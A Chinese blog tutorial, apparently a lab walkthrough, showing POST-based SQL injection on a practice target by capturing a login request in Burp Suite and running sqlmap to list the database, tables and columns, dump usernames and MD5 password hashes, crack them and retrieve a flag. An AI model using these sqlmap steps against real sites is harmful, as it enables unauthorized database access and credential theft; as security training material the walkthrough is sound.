前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >POST型SQL注入教学

POST型SQL注入教学

原创
作者头像
酷酷的繁星
修改2020-04-15 19:12:47
2K1
修改2020-04-15 19:12:47
举报
文章被收录于专栏:Web安全技术Web安全技术

这次教学要用到的工具有burpsuite,SQLMAP,浏览器

上次我给大家分享的AJE-Windows里面什么工具都有,可以直接装一个AJE-Windows工具不用一个一个的下,太麻烦

然后这次教学要用到的SQLMAP模块参数给大家说一下

--current-db //获取当前使用 的数据库

–tables 列出指定数据库中的表

--columns  //获取当前数据库中当前表的所有列名

--dump //获取当前数据库中当前表的所有用户名和密码

首先我们打开我们的AJE-Windows,再打开SQLMAP和burpsuite

靶场地址是http://219.153.49.228:45888

我们随便输入账号密码,然后打开burpsuite开启拦截包之后点登录,右键把拦截的数据包发送到repeater

右键文件复制到桌面

输入文件名然后点击保存

然后输入sqlmap.py -r 这里写刚刚保存的数据包(拖拽) --current-db回车

好的跑出来了,这个站常用的数据库名是mozhe_Discuz_StormGroup

然后接下来跑数据库表名sqlmap.py -r 抓包的文件 -D 该站点用的数据库名 --tables

跑出来的表名是StormGroup_member

接下来跑表内字段sqlmap.py -r 数据包文件 -D 数据库名 -T 表名 --columns

跑出来了表内字段name和password,这两个分别是用户名的列名和密码的列名

接下来跑用户名和密码sqlmap.py -r 数据包文件 -D 库名 -T 表名 -C name,password --dump

第一个用户名是mozhe第二个也是,第一个密码是356f589a7df439f6f744ff19bb8092c0第二个密码是

cac346c4e78571439ba96bc5a47c01b6,它用的是MD5加密,第一个解出来是dsan13

我们试试第一个能不能登上去

第一个登陆失败了试试第二个,第二个解出来密码是885288

我们登陆试试,登陆成功了,key是mozhe4953564e012470c2374e45919c2

提交key

好的,本次教学就到这里,喜欢我文章的欢迎点赞加关注,再订阅一下我的专栏,或者加入我专栏,有什么地方写的不好的欢迎加我QQ3516634930反馈

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档